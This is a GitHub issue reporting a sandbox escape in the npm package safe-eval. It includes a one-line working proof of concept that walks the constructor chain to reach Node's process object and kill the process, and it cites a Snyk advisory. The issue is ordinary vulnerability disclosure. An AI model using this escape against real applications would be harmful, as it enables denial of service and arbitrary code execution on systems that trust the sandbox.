Skip to content

safe-eval Sandbox Escaping #51

@64BitUniverse

Description

@64BitUniverse

Is this going to be fixed? It is easy for people to exploit this with:

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");

Source: https://snyk.io/vuln/npm:safe-eval:20170830

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions